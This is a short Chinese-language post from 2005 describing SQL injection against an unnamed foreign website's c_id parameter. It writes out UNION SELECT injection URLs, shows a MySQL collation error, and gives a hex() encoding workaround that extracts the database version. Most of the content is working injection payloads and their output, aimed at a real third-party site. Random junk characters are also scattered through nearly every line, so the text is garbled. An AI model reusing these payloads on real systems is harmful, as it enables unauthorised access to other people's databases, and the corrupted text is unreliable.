本文作者:SuperHei _6 n" [. k/ l, X7 [
文章性质:原创
$ b8 E) d5 N# M* G6 }9 h6 B发布日期:2005-10-186 ~& K2 G8 H: j: m: m+ S O' M& ^
测试个国外的站时:* { S0 Y* ~ `3 {4 M5 G5 M5 x
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*& s; b9 N0 Q! k4 X7 |
返回错误:
; A0 H5 F0 f' ?) o5 h. lIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'7 @& j: [1 Y6 s( Z. h
MySQL Error No. 126% p" m/ Y$ f3 F, ^! V" e, [0 m
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。6 o0 `# L- k8 M& O1 n4 p
解决办法:转为其他编码如hex。
4 X. v1 v" F$ H$ t% kurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
' W2 U7 g) G' a8 k0 j成功得到hex(version())的值为:
W0 Q4 z: P9 k _; `+ D0 v+ q342E312E332D626574610 [; x- S" Q2 m$ J x
回Mysql查询下得到:
! u' R2 Z1 E# F* a" J2 R. i! w- [! kmysql> select 0x342E312E332D62657461;
3 Y/ f5 j( w$ @' c9 z D+------------------------+
0 d2 ]" S; h* e y/ d' t| 0x342E312E332D62657461 |$ ]. v' X2 ]0 [8 A( w
+------------------------+
' j/ F+ G% e3 X- o* @) q$ m| 4.1.3-beta |( c2 X g: W) I& ^' P
+------------------------+! ^9 o% B. D/ F. p3 b4 v6 f
1 row in set (0.00 sec)
$ T% H$ u& l2 X
6 r; e9 p" Z8 ^# Q |